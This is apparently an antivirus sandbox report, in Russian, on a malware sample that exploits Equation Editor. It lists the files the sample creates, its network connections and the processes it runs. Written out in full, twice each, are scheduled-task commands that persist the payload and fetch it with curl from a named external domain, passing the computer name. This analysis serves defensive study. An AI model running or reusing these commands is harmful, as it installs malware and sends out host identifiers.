Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\windows\glmxact\glmfac
- <SYSTEM32>\tasks\windows\glmxact\glm
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 20 /TN \Windows\Glmxact\GlmFac /TR "%AppData%\glmx32.exe" /f
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 15 /TN \Windows\Glmxact\Glm /TR "cmd /c start /min curl --output %AppData%\glmx32.exe -O ""https://nymedsvcsystems.com/nt.php/?dt=%computername%-NT-2&ct=NT"""
Сетевая активность
Подключается к
- 'ny####vcsystems.com':80
- 'ny####vcsystems.com':443
TCP
Запросы HTTP GET
- http://ny####vcsystems.com/ntt/se
Другие
- 'ny####vcsystems.com':443
UDP
- DNS ASK ny####vcsystems.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 20 /TN \Windows\Glmxact\GlmFac /TR "%AppData%\glmx32.exe" /f' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 15 /TN \Windows\Glmxact\Glm /TR "cmd /c start /min curl --output %AppData%\glmx32.exe -O ""https://nymedsvcsystems.com/nt.php/?dt=%computername%-NT-2&ct=NT"""' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
